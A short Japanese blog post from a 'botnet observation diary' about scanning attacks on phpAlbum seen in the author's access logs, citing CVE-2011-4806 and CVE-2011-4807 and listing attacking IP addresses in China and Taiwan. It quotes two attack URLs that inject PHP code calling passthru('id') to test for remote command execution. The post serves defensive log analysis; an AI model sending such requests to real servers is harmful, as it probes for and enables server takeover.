cNotes 検索 一覧 カテゴリ

最近のアクセスログ - phpalbumへの攻撃

Published: 2011/12/28

これも多く残ってます。

phpalbumへの攻撃です。

  • CVE-2011-4806
  • CVE-2011-4807

このようなリクエスト。スキャン用。

 /apps/phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
 /phpalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;

passthruファンクションを使って脆弱性があるサーバーかしらべて、のっとった後はマルウェアをこのサーバーに設置することが目的?

攻撃元はやはりアジア。
IPnameASAS name
59.108.108.100NONE4847CNIX-AP_China_Networks_Inter-ExchangeCN
202.100.80.21NONE4134CHINANET-BACKBONE_No.31Jin-rong_StreetCN
203.72.59.6NONE1659ERX-TANET-ASN1_Tiawan_Academic_Network_(TANet)_Information_CenterTW

[カテゴリ:botnet観察日記]

by jyake